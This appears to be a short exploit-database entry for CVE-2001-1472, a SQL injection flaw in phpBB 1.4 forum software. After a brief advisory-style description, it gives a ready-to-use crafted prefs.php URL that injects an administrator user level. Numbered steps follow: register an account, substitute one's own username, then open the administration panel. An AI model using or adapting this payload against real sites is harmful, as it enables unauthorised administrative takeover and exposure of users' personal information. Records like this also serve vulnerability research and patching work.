phpBB 1.4 Remote SQL Query Manipulation Vulnerability. CVE-2001-1472. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/3142/info phpBB is free, open-source, easy-to-use web forums software. An issue exists in phpBB which allows a remote attacker to manipulate SQL queries in such a way as to gain an administrative account with the service. This problem is due to improper validation of user-supplied input by certain variables in phpBB. This issue can be exploited by making a cleverly crafted web request that contains arbitrary user-supplied replacement values. One consequence of successful exploitation is that the attacker will be privy to user information. http://sitename/phpBBfolder/prefs.php?save=1 &viewemail=1',user_level%3D'4'%20where% 20username%3D'l337h4x0r'%23 Summary: 1. Register an account on a phpBB board version 1.4.x . 2. Enter above URL with the correct sitename and replace l337h4x0r with your username. 3. Click on "Administration Panel" near the bottom of the page.